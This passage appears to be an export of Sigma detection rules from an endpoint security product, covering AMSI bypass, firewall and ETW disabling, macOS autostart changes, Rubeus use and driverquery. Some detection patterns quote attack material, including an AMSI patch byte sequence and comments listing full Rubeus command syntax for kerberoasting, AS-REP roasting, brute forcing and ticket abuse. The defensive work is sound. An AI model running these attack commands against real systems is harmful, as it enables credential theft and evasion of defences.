'psv2'\n - 'obfuscation'\n\n selection_findamsifun:\n PowershellCommand|contains: 'FindAmsiFun'\n\n selection_various:\n PowershellCommand|contains:\n - 'Bypass.AMSI'\n - 'AmsiX64'\n - 
'AmsiX32'\n\n # https://github.com/Hackplayers/evil-winrm/blob/master/evil-winrm.rb#L1059\n selection_evil_winrm:\n PowershellCommand|contains: '[Byte[]] (0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)'\n\n exclusion_pdf_processing:\n PowershellCommand|contains: \"[System.Management.Automation.PSTypeName]'MCopyProtectedPDFProcessingMode'\"\n\n condition: 1 of selection_* and not (selection_scanbuffer_patch_inmemory and exclusion_pdf_processing)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2",
"rule_name": "AMSI Bypassed via PowerShell",
"rule_description": "Detects when the Antimalware Scan Interface (AMSI) is being bypassed using a PowerShell script.\nAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\nIt is recommended to investigate the PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-06-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bad3446-0e5e-44b4-9fd5-3bb35c6d7625",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086500Z",
"creation_date": "2026-03-23T11:45:34.086502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086506Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1489/"
],
"name": "t1562_004_disable_firewall.yml",
"content": "title: Firewall Disabled\nid: 4bad3446-0e5e-44b4-9fd5-3bb35c6d7625\ndescription: |\n Detects when a common firewall provider (ufw, firewalld, etc.) is disabled.\n Adversaries may disable or modify the system firewall in order to bypass controls limiting network usage.\n It is recommended to investigate suspicious network connections following this action and to look for other malicious behaviors from the process ancestors.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1489/\ndate: 2021/09/22\nmodified: 2025/07/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.impact\n - attack.t1489\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n # Optional options can be placed anywhere in the command line (including in between)\n\n # UFW\n - ' stop *ufw'\n - ' disable *ufw'\n\n # firewalld (default on RHEL/CentOS)\n - ' stop *firewalld'\n - ' disable *firewalld'\n\n selection_systemd_manual:\n Image|endswith: '/rm'\n CommandLine|contains:\n - '/etc/systemd/system/multi-user.target.wants/ufw.service'\n - '/etc/systemd/system/multi-user.target.wants/firewalld.service'\n\n selection_ufw_command_disable_python:\n Image:\n - '*/python'\n - '*/python?'\n - '*/python?.?'\n CommandLine:\n - '*ufw* logging* off*'\n - '*ufw* disable*'\n\n # NOTE: This is not detailed in the documentation but ufw use ufw-init script to handle its operations.\n selection_ufw_command_disable:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n CommandLine:\n - '*ufw-init* stop*'\n - '*ufw-init* 
force-stop*'\n\n exclusion_reload:\n ParentImage|endswith:\n - '/python'\n - '/python?'\n - '/python?.?'\n ParentCommandLine|endswith:\n - ' /sbin/ufw reload'\n - ' /usr/sbin/ufw reload'\n\n exclusion_dpkg:\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_enovacom:\n ParentCommandLine: '/bin/bash /enovacom/CPSureProxy/bin/disable_firewalld.sh'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bad3446-0e5e-44b4-9fd5-3bb35c6d7625",
"rule_name": "Firewall Disabled",
"rule_description": "Detects when a common firewall provider (ufw, firewalld, etc.) is disabled.\nAdversaries may disable or modify the system firewall in order to bypass controls limiting network usage.\nIt is recommended to investigate suspicious network connections following this action and to look for other malicious behaviors from the process ancestors.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-07-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bb43217-fb12-4f07-9618-ffcfdc609ae7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085051Z",
"creation_date": "2026-03-23T11:45:34.085053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/",
"https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_001_windows_etw_disabled.yml",
"content": "title: ETW Disabled via Registry Modification\nid: 4bb43217-fb12-4f07-9618-ffcfdc609ae7\ndescription: |\n Detects a registry modification to set the \"ETWEnabled\" registry key to 0 in order to disable ETW.\n Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\n Attackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\n It is recommended to analyze the process responsible for the registry change to look for malicious content or actions.\nreferences:\n - https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/\n - https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2023/03/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bb43217-fb12-4f07-9618-ffcfdc609ae7",
"rule_name": "ETW Disabled via Registry Modification",
"rule_description": "Detects a registry modification to set the \"ETWEnabled\" registry key to 0 in order to disable ETW.\nEvent Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\nAttackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\nIt is recommended to analyze the process responsible for the registry change to look for malicious content or actions.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bd7a98e-5886-432f-ba63-9789c0b7ae70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093585Z",
"creation_date": "2026-03-23T11:45:34.093587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093591Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_autostart_file_modified.yml",
"content": "title: Autostart File Modified\nid: 4bd7a98e-5886-432f-ba63-9789c0b7ae70\ndescription: |\n Detects the login startup file being modified by a suspicious process.\n This file holds which programs should be automatically started when the machine reboots.\n Attackers can modify this file to include their payload, thus establishing persistence.\n It is recommended to investigate the process that did the modification and which programs were added to the list.\nreferences:\n - https://attack.mitre.org/techniques/T1547/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branch\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path|endswith: 'com.apple.loginwindow.plist'\n Kind: 'write'\n ProcessImage|contains: '?'\n\n filter_legitimate:\n Image|endswith:\n - '/systemmigrationd'\n - '/DesktopServicesHelper'\n - '/diskmanagementd'\n - '/rsync'\n - '/launchd'\n - '/cfprefsd'\n - '/xpcproxy'\n - '/ManagedClient'\n - '/MCXCompositor'\n - '/backupd'\n - '/storagekitd'\n - '/CloneKitService'\n - '/LWWeeklyMessageTracer'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bd7a98e-5886-432f-ba63-9789c0b7ae70",
"rule_name": "Autostart File Modified",
"rule_description": "Detects the login startup file being modified by a suspicious process.\nThis file holds which programs should be automatically started when the machine reboots.\nAttackers can modify this file to include their payload, thus establishing persistence.\nIt is recommended to investigate the process that did the modification and which programs were added to the list.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bda5ac1-8161-4338-88d4-bdb0ab0899ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076783Z",
"creation_date": "2026-03-23T11:45:34.076785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/Rubeus",
"https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
"https://attack.mitre.org/software/S1071/"
],
"name": "rubeus_usage.yml",
"content": "title: Rubeus HackTool Executed\nid: 4bda5ac1-8161-4338-88d4-bdb0ab0899ac\ndescription: |\n Detects the usage of Rubeus from command-line arguments.\n Rubeus is a C# command-line tool developed to misuse and manipulate Kerberos authentication in Windows Active Directory environments.\n This tool has been used by attackers in ransomware operations.\n It is recommended to verify if the usage of this tool is legitimate using the process tree to gather more information about the execution context, as well as to look for any other malicious behavior on the host.\nreferences:\n - https://github.com/GhostPack/Rubeus\n - https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/\n - https://attack.mitre.org/software/S1071/\ndate: 2020/11/16\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.s1071\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Rubeus\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:\n # Rubeus.exe tgtdeleg [/target:SPN]\n selection_tgtdeleg:\n CommandLine|contains: ' tgtdeleg '\n\n # Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:\n # Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec]\n # Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec]\n # 
Retrieve a TGT using a PCKS12 certificate store, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /certificate:C:\\temp\\leaked.pfx /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]\n # Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]\n selection_asktgt_1:\n CommandLine|contains: ' asktgt '\n selection_asktgt_2:\n CommandLine|contains:\n - ' /user:'\n - ' /password:'\n - ' /enctype:'\n - ' /des:'\n - ' /rc4:'\n - ' /aes128:'\n - ' /aes256:'\n - ' /domain:'\n - ' /dc:'\n\n # Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:\n # Rubeus.exe asktgs [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec]\n selection_asktgs_1:\n CommandLine|contains: ' asktgs '\n selection_asktgs_2:\n CommandLine|contains:\n - ' /ticket:'\n - ' /service:'\n\n # Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit:\n # Rubeus.exe renew [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]\n selection_renew:\n CommandLine|contains|all:\n - ' renew '\n - ' /ticket:'\n\n # Perform a Kerberos-based password bruteforcing attack:\n # Rubeus.exe brute [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]\n selection_brute_1:\n CommandLine|contains: ' brute '\n selection_brute_2:\n CommandLine|contains:\n 
- ' /password:'\n - ' /passwords:'\n - ' /user:'\n - ' /users:'\n - ' /domain:'\n - ' /creduser:'\n - ' /credpassword:'\n\n # Perform Kerberoasting:\n # Rubeus.exe kerberoast [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting, outputting hashes to a file:\n # Rubeus.exe kerberoast /outfile:hashes.txt [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"]\n # Perform Kerberoasting, outputting hashes in the file output format, but to the console:\n # Rubeus.exe kerberoast /simple [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting with alternate credentials:\n # Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/spn:\"blah/blah\"] [/spns:C:\\temp\\spns.txt] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting with an existing TGT:\n # Rubeus.exe kerberoast [/nowrap]\n # Perform Kerberoasting with an existing TGT using an enterprise principal:\n # Rubeus.exe kerberoast /enterprise [/nowrap]\n # Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:\n # Rubeus.exe kerberoast /usetgtdeleg [/nowrap]\n # Perform \"opsec\" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:\n # Rubeus.exe kerberoast /rc4opsec [/nowrap]\n # List statistics about found Kerberoastable accounts without actually sending ticket requests:\n # Rubeus.exe kerberoast /stats [/nowrap]\n # Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):\n # Rubeus.exe kerberoast /ldapfilter:'admincount=1' [/nowrap]\n # Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 
03-29-2010, returning up to 5 service tickets:\n # Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/nowrap]\n # Perform AES Kerberoasting:\n # Rubeus.exe kerberoast /aes [/nowrap]\n selection_kerberoast_1:\n CommandLine|contains: ' kerberoast '\n selection_kerberoast_2:\n CommandLine|contains:\n - ' /spn:'\n - ' /spns:'\n - ' /user:'\n - ' /domain:'\n - ' /credpassword:'\n - ' /creduser:'\n - ' /ticket:'\n - ' /usetgtdeleg'\n - ' /rc4opsec'\n - ' /stats'\n - ' /ldapfilter:'\n - ' /pwdsetafter:'\n - ' /aes'\n\n # Perform AS-REP \"roasting\" for any users without preauth:\n # Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform AS-REP \"roasting\" for any users without preauth, outputting Hashcat format to a file:\n # Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"]\n # Perform AS-REP \"roasting\" for any users without preauth using alternate credentials:\n # Rubeus.exe asreproast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU,...\"] [/nowrap]\n selection_asreproast_1:\n CommandLine|contains: ' asreproast '\n selection_asreproast_2:\n CommandLine|contains:\n - ' /spn:'\n - ' /spns:'\n - ' /user:'\n - ' /domain'\n - ' /format:'\n - ' /creduser:'\n - ' /credpassword:'\n\n selection_ptt:\n CommandLine|contains|all:\n - ' ptt '\n - ' /ticket:'\n\n # Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:\n # Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\n # List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:\n # Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\n # Dump all current ticket data (if elevated, dump for all 
users), optionally targeting a specific service/LUID:\n # Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]\n selection_extract_harvest_1:\n CommandLine|contains:\n - ' triage '\n - ' klist '\n - ' dump '\n selection_extract_harvest_2:\n CommandLine|contains:\n - ' /luid:'\n - ' /service:krbtgt'\n - ' /user:'\n\n # Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LUID:\n # Rubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" [/show]\n selection_createnetonly:\n CommandLine|contains|all:\n - ' createnetonly '\n - ' /program:'\n\n # Perform S4U constrained delegation abuse:\n # Rubeus.exe s4u /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]\n # Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]\n # Perform S4U constrained delegation abuse across domains:\n # Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self]\n selection_s4u_1:\n CommandLine|contains: ' s4u '\n selection_s4u_2:\n CommandLine|contains:\n - ' /ticket:'\n - ' /impersonateuser:'\n - ' /tgs:'\n - ' /user:'\n\n # Some parameters (klist, ..) don't require other parameters. 
We want to be able to detect rubeus anyway, so match on internal data about it\n selection_internal_name:\n Description: 'Rubeus'\n OriginalFileName: 'Rubeus.exe'\n InternalName: 'Rubeus.exe'\n\n exclusion_solidworks:\n ProcessImage: '?:\\Program Files\\SOLIDWORKS Corp\\SOLIDWORKS Flow Simulation\\binCFW\\efdsolver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mentor Graphics Corporation'\n\n condition: (selection_tgtdeleg or (all of selection_asktgt_*) or (all of selection_asktgs_*) or selection_renew or (all of selection_brute_*) or (all of selection_kerberoast_*) or (all of selection_asreproast_*) or selection_ptt or (all of selection_extract_harvest_*) or selection_createnetonly or (all of selection_s4u_*) or selection_internal_name) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bda5ac1-8161-4338-88d4-bdb0ab0899ac",
"rule_name": "Rubeus HackTool Executed",
"rule_description": "Detects the usage of Rubeus from command-line arguments.\nRubeus is a C# command-line tool developed to misuse and manipulate Kerberos authentication in Windows Active Directory environments.\nThis tool has been used by attackers in ransomware operations.\nIt is recommended to verify if the usage of this tool is legitimate using the process tree to gather more information about the execution context, as well as to look for any other malicious behavior on the host.\n",
"rule_creation_date": "2020-11-16",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1550.002",
"attack.t1550.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c017732-d9c4-4ebf-ac10-8714261e6380",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296733Z",
"creation_date": "2026-03-23T11:45:35.296735Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296740Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/driverquery",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_driverquery.yml",
"content": "title: DriverQuery Execution\nid: 4c017732-d9c4-4ebf-ac10-8714261e6380\ndescription: |\n Detects the execution of 'driverquery.exe'.\n Driverquery is often used by attackers to gather detailed information about the different drivers on a running on a system.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/driverquery\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/05/06\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\driverquery.exe'\n # Renamed binaries\n - OriginalFileName: 'drvqry.exe'\n\n selection_context:\n ParentImage|contains: '?'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_program_files:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_sophos:\n ParentImage: '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-repair.exe'\n\n exclusion_lenovo:\n ParentCommandLine|endswith: ' /C driverquery /fo list | findstr MEIx64'\n GrandparentImage|endswith:\n - '\\fwdetect.exe'\n - '\\fwdetect_v??.exe'\n\n exclusion_fujitsu:\n ParentCommandLine|contains: ' /c Driverquery | findstr '\n GrandparentImage|endswith: '\\CheckBatteryFW.exe'\n\n exclusion_nordvpn:\n ParentImage: '*\\AppData\\Local\\Temp\\\\*\\nordvpn-*.tmp'\n GrandparentImage: '*\\nordvpn-*.exe'\n\n exclusion_hp:\n - ParentImage:\n - '?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\hpanalyticscomp.inf_*\\x64\\TouchpointAnalyticsClient.exe'\n - 
